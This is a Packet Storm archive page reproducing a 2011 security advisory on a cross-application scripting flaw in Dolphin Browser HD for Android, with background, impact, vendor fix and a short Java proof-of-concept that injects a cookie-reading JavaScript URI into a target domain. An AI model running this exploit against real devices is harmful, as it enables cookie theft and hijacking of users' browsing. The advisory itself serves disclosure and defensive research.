exploit the possibilities

Dolphin Browser HD Cross Application Scripting

Dolphin Browser HD Cross Application Scripting
Posted Sep 21, 2011
Authored by Yair Amit, Roee Hay

Dolphin Browser HD versions prior to 6.1.0 suffer from a cross applications scripting vulnerability.

tags | exploit
advisories | CVE-2011-2357
MD5 | 826ca615f66eec0b96c8a93b6448b8a9

Dolphin Browser HD Cross Application Scripting

Change Mirror Download
1 Background
============
Android applications are executed in a sandbox environment, to ensure that no
application can access sensitive information held by another, without adequate
privileges. For example, the Dolphin browser application holds sensitive
information such as cookies, cache and history, and this cannot be accessed
by third-party apps. An android app may request specific privileges during
its installation; if granted by the user, the app's capabilities are extended.

Intents are used by Android apps for intercommunication. These objects can be
broadcast, passed to the startActivity call (when an application starts another
activity), or passed to the startService call (when an application starts a
service). Normally, when startActivity is called, the target activity's
onCreate method is executed. However, under AndroidManifest.xml it is possible
to define different launch tags, which affect this behavior. One example is the
singleTask launch tag, which makes the activity act as a singleton. This affects
the startActivity call: if the activity has already been started when the call
is made, the activity's onNewIntent member function is called instead of its
onCreate method.

2 Vulnerability
===============
A 3rd party application may exploit Dolphin Browser HD's URL loading process in
order to inject JavaScript code into an arbitrary domain thus break Android's
sandboxing. This can be done by sending two consecutive startActivity calls. The
first call includes the attacked domain, and causes Dolphin Browser HD to load
it, while the second call contains JavaScript code. the JavaScript URI will be
opened under the current tab, i.e. the attacked domain.

3 Impact
========
By exploiting this vulnerability a malicious, non-privileged application may
inject JavaScript code into the context of any domain; therefore, this
vulnerability has the same implications as global XSS, albeit from an installed
application rather than another website. Additionally, an application may
install itself as a service, in order to inject JavaScript code from time to
time into the currently opened tab, thus completely intercepting the user's
browsing experience.

4 Proof-of-Concept
==================
The following is a PoC for the second technique:

public class CasExploit extends Activity
{
static final String mPackage = "mobi.mgeek.TunnyBrowser";
static final String mClass = "BrowserActivity";
static final String mUrl = "http://target.domain/";
static final String mJavascript = "alert(document.cookie)";
static final int mSleep = 15000;

@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
startBrowserActivity(mUrl);
try {
Thread.sleep(mSleep);
}
catch (InterruptedException e) {}
startBrowserActivity("javascript:" + mJavascript);

}

private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
res.setData(Uri.parse(url));
startActivity(res);
}

}

5 Vulnerable versions
=====================
Dolphin Browser HD 6.0.0 has been found vulnerable.

6 Vendor Response
=================
Dolphin Browser HD 6.1.0 has been released to Android Market, which incorporates
a fix for this bug.

8 Credit
========
* Roee Hay <roeeh@il.ibm.com>
* Yair Amit <yairam@gmail.com>

9 References
============
* Original advisory: http://blog.watchfire.com/files/advisory-dolphin.pdf
* Blog post:
http://blog.watchfire.com/wfblog/2011/09/dolphin-browser-hd-cross-application-scripting.html
* Demo of the PoC: http://youtu.be/1E0GzZPdpLM
* Android Browser Cross-Application Scripting (CVE-2011-2357):
http://blog.watchfire.com/files/advisory-android-browser.pdf

10 Acknowledgments
==================
We would like to thank the Dolphin Browser team for the efficient and quick way
in which it handled this security issue.
Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close